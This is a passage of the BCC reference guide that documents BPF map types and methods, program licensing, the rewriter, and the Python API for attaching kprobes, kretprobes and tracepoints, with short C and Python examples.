<a href="https://github.com/iovisor/bcc/search?q=BPF_PROG_ARRAY+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PROG_ARRAY+path%3Atests&type=Code">search /tests</a>,
|
||
<a href="https://github.com/iovisor/bcc/blob/master/examples/networking/tunnel_monitor/monitor.py#L24-L26">assign fd</a></p>
|
||
<h3 id="11-bpf_devmap"><a class="header" href="#11-bpf_devmap">11. BPF_DEVMAP</a></h3>
|
||
<p>Syntax: <code>BPF_DEVMAP(name, size)</code></p>
|
||
<p>This creates a device map named <code>name</code> with <code>size</code> entries. Each entry of the map is an <code>ifindex</code> to a network interface. This map is only used in XDP.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_DEVMAP(devmap, 10);
|
||
</code></pre>
|
||
<p>Methods (covered later): map.redirect_map().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_DEVMAP+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="12-bpf_cpumap"><a class="header" href="#12-bpf_cpumap">12. BPF_CPUMAP</a></h3>
|
||
<p>Syntax: <code>BPF_CPUMAP(name, size)</code></p>
|
||
<p>This creates a cpu map named <code>name</code> with <code>size</code> entries. The index of the map represents the CPU id and each entry is the size of the ring buffer allocated for the CPU. This map is only used in XDP.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_CPUMAP(cpumap, 16);
|
||
</code></pre>
|
||
<p>Methods (covered later): map.redirect_map().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_CPUMAP+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="13-bpf_xskmap"><a class="header" href="#13-bpf_xskmap">13. BPF_XSKMAP</a></h3>
|
||
<p>Syntax: <code>BPF_XSKMAP(name, size [, "/sys/fs/bpf/xyz"])</code></p>
|
||
<p>This creates an xsk map named <code>name</code> with <code>size</code> entries and, if a path is given, pins it to the bpffs as a FILE. Each entry represents one NIC's queue id. This map is only used in XDP to redirect packets to an AF_XDP socket. If the AF_XDP socket is bound to a queue which is different from the current packet's queue id, the packet will be dropped. For kernel v5.3 and later, the <code>lookup</code> method is available and can be used to check whether an AF_XDP socket is available for the current packet's queue id. More details at <a href="https://www.kernel.org/doc/html/latest/networking/af_xdp.html">AF_XDP</a>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_XSKMAP(xsks_map, 8);
|
||
</code></pre>
|
||
<p>Methods (covered later): map.redirect_map(), map.lookup().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_XSKMAP+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="14-bpf_array_of_maps"><a class="header" href="#14-bpf_array_of_maps">14. BPF_ARRAY_OF_MAPS</a></h3>
|
||
<p>Syntax: <code>BPF_ARRAY_OF_MAPS(name, inner_map_name, size)</code></p>
|
||
<p>This creates an array map with a map-in-map type (BPF_MAP_TYPE_ARRAY_OF_MAPS) map named <code>name</code> with <code>size</code> entries. The inner map meta data is provided by map <code>inner_map_name</code> and can be most array or hash map types except <code>BPF_MAP_TYPE_PROG_ARRAY</code>, <code>BPF_MAP_TYPE_CGROUP_STORAGE</code> and <code>BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE</code>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_TABLE("hash", int, int, ex1, 1024);
|
||
BPF_TABLE("hash", int, int, ex2, 1024);
|
||
BPF_ARRAY_OF_MAPS(maps_array, "ex1", 10);
|
||
</code></pre>
|
||
<h3 id="15-bpf_hash_of_maps"><a class="header" href="#15-bpf_hash_of_maps">15. BPF_HASH_OF_MAPS</a></h3>
|
||
<p>Syntax: <code>BPF_HASH_OF_MAPS(name, key_type, inner_map_name, size)</code></p>
|
||
<p>This creates a hash map with a map-in-map type (BPF_MAP_TYPE_HASH_OF_MAPS) map named <code>name</code> with <code>size</code> entries. The inner map meta data is provided by map <code>inner_map_name</code> and can be most of array or hash maps except <code>BPF_MAP_TYPE_PROG_ARRAY</code>, <code>BPF_MAP_TYPE_CGROUP_STORAGE</code> and <code>BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE</code>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_ARRAY(ex1, int, 1024);
|
||
BPF_ARRAY(ex2, int, 1024);
|
||
BPF_HASH_OF_MAPS(maps_hash, struct custom_key, "ex1", 10);
|
||
</code></pre>
|
||
<h3 id="16-bpf_stack"><a class="header" href="#16-bpf_stack">16. BPF_STACK</a></h3>
|
||
<p>Syntax: <code>BPF_STACK(name, leaf_type, max_entries[, flags])</code></p>
|
||
<p>Creates a stack named <code>name</code> with value type <code>leaf_type</code> and max entries <code>max_entries</code>.
|
||
Stack and Queue maps are only available from Linux 4.20+.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_STACK(stack, struct event, 10240);
|
||
</code></pre>
|
||
<p>This creates a stack named <code>stack</code> where the value type is <code>struct event</code>, that holds up to 10240 entries.</p>
|
||
<p>Methods (covered later): map.push(), map.pop(), map.peek().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_STACK+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="17-bpf_queue"><a class="header" href="#17-bpf_queue">17. BPF_QUEUE</a></h3>
|
||
<p>Syntax: <code>BPF_QUEUE(name, leaf_type, max_entries[, flags])</code></p>
|
||
<p>Creates a queue named <code>name</code> with value type <code>leaf_type</code> and max entries <code>max_entries</code>.
|
||
Stack and Queue maps are only available from Linux 4.20+.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_QUEUE(queue, struct event, 10240);
|
||
</code></pre>
|
||
<p>This creates a queue named <code>queue</code> where the value type is <code>struct event</code>, that holds up to 10240 entries.</p>
|
||
<p>Methods (covered later): map.push(), map.pop(), map.peek().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_QUEUE+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="18-bpf_sockhash"><a class="header" href="#18-bpf_sockhash">18. BPF_SOCKHASH</a></h3>
|
||
<p>Syntax: <code>BPF_SOCKHASH(name[, key_type [, max_entries]])</code></p>
|
||
<p>Creates a hash named <code>name</code>, with optional parameters. sockhash is only available from Linux 4.18+.</p>
|
||
<p>Default: <code>BPF_SOCKHASH(name, key_type=u32, max_entries=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">struct sock_key {
|
||
u32 remote_ip4;
|
||
u32 local_ip4;
|
||
u32 remote_port;
|
||
u32 local_port;
|
||
};
|
||
BPF_SOCKHASH(skh, struct sock_key, 65535);
|
||
</code></pre>
|
||
<p>This creates a hash named <code>skh</code> where the key is a <code>struct sock_key</code>.</p>
|
||
<p>A sockhash is a BPF map type that holds references to sock structs. Then with a new sk/msg redirect bpf helper BPF programs can use the map to redirect skbs/msgs between sockets (<code>map.sk_redirect_hash()/map.msg_redirect_hash()</code>).</p>
|
||
<p>The difference between <code>BPF_SOCKHASH</code> and <code>BPF_SOCKMAP</code> is that <code>BPF_SOCKMAP</code> is implemented based on an array and enforces keys to be four bytes, while <code>BPF_SOCKHASH</code> is implemented based on a hash table and the type of key can be specified freely.</p>
|
||
<p>Methods (covered later): map.sock_hash_update(), map.msg_redirect_hash(), map.sk_redirect_hash().</p>
|
||
<p><a href="https://github.com/iovisor/bcc/search?q=BPF_SOCKHASH+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="19-maplookup"><a class="header" href="#19-maplookup">19. map.lookup()</a></h3>
|
||
<p>Syntax: <code>*val map.lookup(&key)</code></p>
|
||
<p>Lookup the key in the map, and return a pointer to its value if it exists, else NULL. The key is passed by address, i.e. as a pointer to the key.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=lookup+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=lookup+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="20-maplookup_or_try_init"><a class="header" href="#20-maplookup_or_try_init">20. map.lookup_or_try_init()</a></h3>
|
||
<p>Syntax: <code>*val map.lookup_or_try_init(&key, &zero)</code></p>
|
||
<p>Lookup the key in the map, and return a pointer to its value if it exists, else initialize the key's value to the second argument. This is often used to initialize values to zero. If the key cannot be inserted (e.g. the map is full) then NULL is returned.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=lookup_or_try_init+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=lookup_or_try_init+path%3Atools&type=Code">search /tools</a></p>
|
||
<p>Note: The old map.lookup_or_init() may cause return from the function, so lookup_or_try_init() is recommended as it
|
||
does not have this side effect.</p>
|
||
<h3 id="21-mapdelete"><a class="header" href="#21-mapdelete">21. map.delete()</a></h3>
|
||
<p>Syntax: <code>map.delete(&key)</code></p>
|
||
<p>Delete the key from the hash.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=delete+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=delete+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="22-mapupdate"><a class="header" href="#22-mapupdate">22. map.update()</a></h3>
|
||
<p>Syntax: <code>map.update(&key, &val)</code></p>
|
||
<p>Associate the value in the second argument to the key, overwriting any previous value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=update+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=update+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="23-mapinsert"><a class="header" href="#23-mapinsert">23. map.insert()</a></h3>
|
||
<p>Syntax: <code>map.insert(&key, &val)</code></p>
|
||
<p>Associate the value in the second argument to the key, only if there was no previous value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=insert+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=insert+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="24-mapincrement"><a class="header" href="#24-mapincrement">24. map.increment()</a></h3>
|
||
<p>Syntax: <code>map.increment(key[, increment_amount])</code></p>
|
||
<p>Increments the key's value by <code>increment_amount</code>, which defaults to 1. Used for histograms.</p>
|
||
<p><code>map.increment()</code> is not atomic. Under concurrency, if you want more accurate results, use <code>map.atomic_increment()</code> instead of <code>map.increment()</code>. The overhead of <code>map.increment()</code> and <code>map.atomic_increment()</code> is similar.</p>
|
||
<p>Note. When using <code>map.atomic_increment()</code> to operate on a BPF map of type <code>BPF_MAP_TYPE_HASH</code>, <code>map.atomic_increment()</code> does not guarantee the atomicity of the operation when the specified key does not exist.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=increment+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=increment+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="25-mapget_stackid"><a class="header" href="#25-mapget_stackid">25. map.get_stackid()</a></h3>
|
||
<p>Syntax: <code>int map.get_stackid(void *ctx, u64 flags)</code></p>
|
||
<p>This walks the stack found via the struct pt_regs in <code>ctx</code>, saves it in the stack trace map, and returns a unique ID for the stack trace.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=get_stackid+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=get_stackid+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="26-mapperf_read"><a class="header" href="#26-mapperf_read">26. map.perf_read()</a></h3>
|
||
<p>Syntax: <code>u64 map.perf_read(u32 cpu)</code></p>
|
||
<p>This returns the hardware performance counter as configured in <a href="bcc-documents/reference_guide.html#5-bpf_perf_array">5. BPF_PERF_ARRAY</a></p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_read+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="27-mapcall"><a class="header" href="#27-mapcall">27. map.call()</a></h3>
|
||
<p>Syntax: <code>void map.call(void *ctx, int index)</code></p>
|
||
<p>This invokes <code>bpf_tail_call()</code> to tail-call the bpf program which the <code>index</code> entry in <a href="bcc-documents/reference_guide.html#10-bpf_prog_array">BPF_PROG_ARRAY</a> points to. A tail-call is different from the normal call. It reuses the current stack frame after jumping to another bpf program and never goes back. If the <code>index</code> entry is empty, it won't jump anywhere and the program execution continues as normal.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_PROG_ARRAY(prog_array, 10);
|
||
|
||
int tail_call(void *ctx) {
|
||
bpf_trace_printk("Tail-call\n");
|
||
return 0;
|
||
}
|
||
|
||
int do_tail_call(void *ctx) {
|
||
bpf_trace_printk("Original program\n");
|
||
prog_array.call(ctx, 2);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<pre><code class="language-Python">b = BPF(src_file="example.c")
|
||
tail_fn = b.load_func("tail_call", BPF.KPROBE)
|
||
prog_array = b.get_table("prog_array")
|
||
prog_array[c_int(2)] = c_int(tail_fn.fd)
|
||
b.attach_kprobe(event="some_kprobe_event", fn_name="do_tail_call")
|
||
</code></pre>
|
||
<p>This assigns <code>tail_call()</code> to <code>prog_array[2]</code>. At the end of <code>do_tail_call()</code>, <code>prog_array.call(ctx, 2)</code> tail-calls <code>tail_call()</code> and executes it.</p>
|
||
<p><strong>NOTE:</strong> To prevent infinite loops, the maximum number of tail-calls is 32 (<a href="https://github.com/torvalds/linux/search?l=C&q=MAX_TAIL_CALL_CNT+path%3Ainclude%2Flinux&type=Code"><code>MAX_TAIL_CALL_CNT</code></a>).</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?l=C&q=call+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?l=C&q=call+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="28-mapredirect_map"><a class="header" href="#28-mapredirect_map">28. map.redirect_map()</a></h3>
|
||
<p>Syntax: <code>int map.redirect_map(int index, int flags)</code></p>
|
||
<p>This redirects the incoming packets based on the <code>index</code> entry. If the map is <a href="bcc-documents/reference_guide.html#11-bpf_devmap">BPF_DEVMAP</a>, the packet will be sent to the transmit queue of the network interface that the entry points to. If the map is <a href="bcc-documents/reference_guide.html#12-bpf_cpumap">BPF_CPUMAP</a>, the packet will be sent to the ring buffer of the <code>index</code> CPU and be processed by the CPU later. If the map is <a href="bcc-documents/reference_guide.html#13-bpf_xskmap">BPF_XSKMAP</a>, the packet will be sent to the AF_XDP socket attached to the queue.</p>
|
||
<p>If the packet is redirected successfully, the function will return XDP_REDIRECT. Otherwise, it will return XDP_ABORTED to discard the packet.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_DEVMAP(devmap, 1);
|
||
|
||
int redirect_example(struct xdp_md *ctx) {
|
||
return devmap.redirect_map(0, 0);
|
||
}
|
||
int xdp_dummy(struct xdp_md *ctx) {
|
||
return XDP_PASS;
|
||
}
|
||
</code></pre>
|
||
<pre><code class="language-Python">ip = pyroute2.IPRoute()
|
||
idx = ip.link_lookup(ifname="eth1")[0]
|
||
|
||
b = bcc.BPF(src_file="example.c")
|
||
|
||
devmap = b.get_table("devmap")
|
||
devmap[c_uint32(0)] = c_int(idx)
|
||
|
||
in_fn = b.load_func("redirect_example", BPF.XDP)
|
||
out_fn = b.load_func("xdp_dummy", BPF.XDP)
|
||
b.attach_xdp("eth0", in_fn, 0)
|
||
b.attach_xdp("eth1", out_fn, 0)
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?l=C&q=redirect_map+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="29-mappush"><a class="header" href="#29-mappush">29. map.push()</a></h3>
|
||
<p>Syntax: <code>int map.push(&val, int flags)</code></p>
|
||
<p>Push an element onto a Stack or Queue table.
|
||
Passing BPF_EXIST as a flag causes the Queue or Stack to discard the oldest element if it is full.
|
||
Returns 0 on success, negative error on failure.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=push+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="30-mappop"><a class="header" href="#30-mappop">30. map.pop()</a></h3>
|
||
<p>Syntax: <code>int map.pop(&val)</code></p>
|
||
<p>Pop an element from a Stack or Queue table. <code>*val</code> is populated with the result.
|
||
Unlike peeking, popping removes the element.
|
||
Returns 0 on success, negative error on failure.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=pop+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="31-mappeek"><a class="header" href="#31-mappeek">31. map.peek()</a></h3>
|
||
<p>Syntax: <code>int map.peek(&val)</code></p>
|
||
<p>Peek an element at the head of a Stack or Queue table. <code>*val</code> is populated with the result.
|
||
Unlike popping, peeking does not remove the element.
|
||
Returns 0 on success, negative error on failure.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=peek+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="32-mapsock_hash_update"><a class="header" href="#32-mapsock_hash_update">32. map.sock_hash_update()</a></h3>
|
||
<p>Syntax: <code>int map.sock_hash_update(struct bpf_sock_ops *skops, &key, int flags)</code></p>
|
||
<p>Add an entry to, or update a sockhash map referencing sockets. The skops is used as a new value for the entry associated to key. flags is one of:</p>
|
||
<pre><code class="language-sh">BPF_NOEXIST: The entry for key must not exist in the map.
|
||
BPF_EXIST: The entry for key must already exist in the map.
|
||
BPF_ANY: No condition on the existence of the entry for key.
|
||
</code></pre>
|
||
<p>If the map has eBPF programs (parser and verdict), those will be inherited by the socket being added. If the socket is already attached to eBPF programs, this results in an error.</p>
|
||
<p>Return 0 on success, or a negative error in case of failure.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=sock_hash_update+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="33-mapmsg_redirect_hash"><a class="header" href="#33-mapmsg_redirect_hash">33. map.msg_redirect_hash()</a></h3>
|
||
<p>Syntax: <code>int map.msg_redirect_hash(struct sk_msg_buff *msg, void *key, u64 flags)</code></p>
|
||
<p>This helper is used in programs implementing policies at the socket level. If the message msg is allowed to pass (i.e. if the verdict eBPF program returns SK_PASS), redirect it to the socket referenced by map (of type BPF_MAP_TYPE_SOCKHASH) using hash key. Both ingress and egress interfaces can be used for redirection. The BPF_F_INGRESS value in flags is used to make the distinction (ingress path is selected if the flag is present, egress path otherwise). This is the only flag supported for now.</p>
|
||
<p>Return SK_PASS on success, or SK_DROP on error.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=msg_redirect_hash+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="34-mapsk_redirect_hash"><a class="header" href="#34-mapsk_redirect_hash">34. map.sk_redirect_hash()</a></h3>
|
||
<p>Syntax: <code>int map.sk_redirect_hash(struct sk_buff *skb, void *key, u64 flags)</code></p>
|
||
<p>This helper is used in programs implementing policies at the skb socket level. If the sk_buff skb is allowed to pass (i.e. if the verdict eBPF program returns SK_PASS), redirect it to the socket referenced by map (of type BPF_MAP_TYPE_SOCKHASH) using hash key. Both ingress and egress interfaces can be used for redirection. The BPF_F_INGRESS value in flags is used to make the distinction (ingress path is selected if the flag is present, egress otherwise). This is the only flag supported for now.</p>
|
||
<p>Return SK_PASS on success, or SK_DROP on error.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=sk_redirect_hash+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h2 id="licensing"><a class="header" href="#licensing">Licensing</a></h2>
|
||
<p>Depending on which <a href="bcc-documents/kernel-versions.html#helpers">BPF helpers</a> are used, a GPL-compatible license is required.</p>
|
||
<p>The special BCC macro <code>BPF_LICENSE</code> specifies the license of the BPF program. You can set the license as a comment in your source code, but the kernel has a special interface to specify it programmatically. If you need to use GPL-only helpers, it is recommended to specify the macro in your C code so that the kernel can understand it:</p>
|
||
<pre><code class="language-C">// SPDX-License-Identifier: GPL-2.0+
|
||
#define BPF_LICENSE GPL
|
||
</code></pre>
|
||
<p>Otherwise, the kernel may reject loading your program (see the <a href="bcc-documents/reference_guide.html#2-cannot-call-gpl-only-function-from-proprietary-program">error description</a> below). Note that it supports multiple words and quotes are not necessary:</p>
|
||
<pre><code class="language-C">// SPDX-License-Identifier: GPL-2.0+ OR BSD-2-Clause
|
||
#define BPF_LICENSE Dual BSD/GPL
|
||
</code></pre>
|
||
<p>Check the <a href="bcc-documents/kernel-versions.html#helpers">BPF helpers reference</a> to see which helpers are GPL-only and what the kernel understands as GPL-compatible.</p>
|
||
<p><strong>If the macro is not specified, BCC will automatically define the license of the program as GPL.</strong></p>
|
||
<h2 id="rewriter"><a class="header" href="#rewriter">Rewriter</a></h2>
|
||
<p>One of the jobs of the rewriter is to turn implicit memory accesses into explicit ones using kernel helpers. Recent kernels introduced a config option ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE, which is set for architectures whose user address space and kernel address space are disjoint. x86 and arm have this config option set while s390 does not. If ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE is not set, the old bpf helper <code>bpf_probe_read()</code> will not be available. Some existing users may have implicit memory accesses to access user memory, so using <code>bpf_probe_read_kernel()</code> will cause their application to fail. Therefore, for non-s390, the rewriter will use <code>bpf_probe_read()</code> for these implicit memory accesses. For s390, <code>bpf_probe_read_kernel()</code> is used as default and users should use <code>bpf_probe_read_user()</code> explicitly when accessing user memory.</p>
|
||
<h1 id="bcc-python"><a class="header" href="#bcc-python">bcc Python</a></h1>
|
||
<h2 id="initialization"><a class="header" href="#initialization">Initialization</a></h2>
|
||
<p>Constructors.</p>
|
||
<h3 id="1-bpf"><a class="header" href="#1-bpf">1. BPF</a></h3>
|
||
<p>Syntax: <code>BPF({text=BPF_program | src_file=filename} [, usdt_contexts=[USDT_object, ...]] [, cflags=[arg1, ...]] [, debug=int])</code></p>
|
||
<p>Creates a BPF object. This is the main object for defining a BPF program, and interacting with its output.</p>
|
||
<p>Exactly one of <code>text</code> or <code>src_file</code> must be supplied (not both).</p>
|
||
<p>The <code>cflags</code> specifies additional arguments to be passed to the compiler, for example <code>-DMACRO_NAME=value</code> or <code>-I/include/path</code>. The arguments are passed as an array, with each element being an additional argument. Note that strings are not split on whitespace, so each argument must be a different element of the array, e.g. <code>["-include", "header.h"]</code>.</p>
|
||
<p>The <code>debug</code> flags control debug output, and can be or'ed together:</p>
|
||
<ul>
|
||
<li><code>DEBUG_LLVM_IR = 0x1</code> compiled LLVM IR</li>
|
||
<li><code>DEBUG_BPF = 0x2</code> loaded BPF bytecode and register state on branches</li>
|
||
<li><code>DEBUG_PREPROCESSOR = 0x4</code> pre-processor result</li>
|
||
<li><code>DEBUG_SOURCE = 0x8</code> ASM instructions embedded with source</li>
|
||
<li><code>DEBUG_BPF_REGISTER_STATE = 0x10</code> register state on all instructions in addition to DEBUG_BPF</li>
|
||
<li><code>DEBUG_BTF = 0x20</code> print the messages from the <code>libbpf</code> library.</li>
|
||
</ul>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python"># define entire BPF program in one line:
|
||
BPF(text='int do_trace(void *ctx) { bpf_trace_printk("hit!\\n"); return 0; }');
|
||
|
||
# define program as a variable:
|
||
prog = """
|
||
int hello(void *ctx) {
|
||
bpf_trace_printk("Hello, World!\\n");
|
||
return 0;
|
||
}
|
||
"""
|
||
b = BPF(text=prog)
|
||
|
||
# source a file:
|
||
b = BPF(src_file = "vfsreadlat.c")
|
||
|
||
# include a USDT object:
|
||
u = USDT(pid=int(pid))
|
||
[...]
|
||
b = BPF(text=bpf_text, usdt_contexts=[u])
|
||
|
||
# add include paths:
|
||
u = BPF(text=prog, cflags=["-I/path/to/include"])
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-usdt"><a class="header" href="#2-usdt">2. USDT</a></h3>
|
||
<p>Syntax: <code>USDT({pid=pid | path=path})</code></p>
|
||
<p>Creates an object to instrument User Statically-Defined Tracing (USDT) probes. Its primary method is <code>enable_probe()</code>.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>pid: attach to this process ID.</li>
|
||
<li>path: instrument USDT probes from this binary path.</li>
|
||
</ul>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python"># include a USDT object:
|
||
u = USDT(pid=int(pid))
|
||
[...]
|
||
b = BPF(text=bpf_text, usdt_contexts=[u])
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=USDT+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=USDT+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h2 id="events"><a class="header" href="#events">Events</a></h2>
|
||
<h3 id="1-attach_kprobe"><a class="header" href="#1-attach_kprobe">1. attach_kprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_kprobe(event="event", fn_name="name")</code></p>
|
||
<p>Instruments the kernel function <code>event()</code> using kernel dynamic tracing of the function entry, and attaches our C defined function <code>name()</code> to be called when the kernel function is called.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_kprobe(event="sys_clone", fn_name="do_trace")
|
||
</code></pre>
|
||
<p>This will instrument the kernel <code>sys_clone()</code> function, which will then run our BPF defined <code>do_trace()</code> function each time it is called.</p>
|
||
<p>You can call attach_kprobe() more than once, and attach your BPF function to multiple kernel functions.
|
||
You can also call attach_kprobe() more than once to attach multiple BPF functions to the same kernel function.</p>
|
||
<p>See the previous kprobes section for how to instrument arguments from BPF.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_kprobe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_kprobe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-attach_kretprobe"><a class="header" href="#2-attach_kretprobe">2. attach_kretprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_kretprobe(event="event", fn_name="name" [, maxactive=int])</code></p>
|
||
<p>Instruments the return of the kernel function <code>event()</code> using kernel dynamic tracing of the function return, and attaches our C defined function <code>name()</code> to be called when the kernel function returns.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_kretprobe(event="vfs_read", fn_name="do_return")
|
||
</code></pre>
|
||
<p>This will instrument the return of the kernel <code>vfs_read()</code> function, which will then run our BPF defined <code>do_return()</code> function each time it returns.</p>
|
||
<p>You can call attach_kretprobe() more than once, and attach your BPF function to multiple kernel function returns.
|
||
You can also call attach_kretprobe() more than once to attach multiple BPF functions to the same kernel function return.</p>
|
||
<p>When a kretprobe is installed on a kernel function, there is a limit on how many parallel calls it can catch. You can change that limit with <code>maxactive</code>. See the kprobes documentation for its default value.</p>
|
||
<p>See the previous kretprobes section for how to instrument the return value from BPF.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_kretprobe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_kretprobe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="3-attach_tracepoint"><a class="header" href="#3-attach_tracepoint">3. attach_tracepoint()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_tracepoint(tp="tracepoint", fn_name="name")</code></p>
|
||
<p>Instruments the kernel tracepoint described by <code>tracepoint</code>, and when hit, runs the BPF function <code>name()</code>.</p>
|
||
<p>This is an explicit way to instrument tracepoints. The <code>TRACEPOINT_PROBE</code> syntax, covered in the earlier tracepoints section, is an alternate method with the advantage of auto-declaring an <code>args</code> struct containing the tracepoint arguments. With <code>attach_tracepoint()</code>, the tracepoint arguments need to be declared in the BPF program.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python"># define BPF program
|
||
bpf_text = """
|
||
#include <uapi/linux/ptrace.h>
|
||
|
||
struct urandom_read_args {
|
||
// from /sys/kernel/debug/tracing/events/random/urandom_read/format
|
||
u64 __unused__;
|
||
u32 got_bits;
|
||
u32 pool_left;
|
||
u32 input_left;
|
||
};
|
||
|
||
int printarg(struct urandom_read_args *args) {
|
||
bpf_trace_printk("%d\\n", args->got_bits);
|
||
return 0;
|
||
};
|
||
"""
|
||
|
||
# load BPF program
|
||
b = BPF(text=bpf_text)
|
||
b.attach_tracepoint("random:urandom_read", "printarg")
|
||
</code></pre>
|
||
<p>Notice how the first argument to <code>printarg()</code> is now our defined struct.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/a4159da8c4ea8a05a3c6e402451f530d6e5a8b41/examples/tracing/urandomread-explicit.py#L41">code</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_tracepoint+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
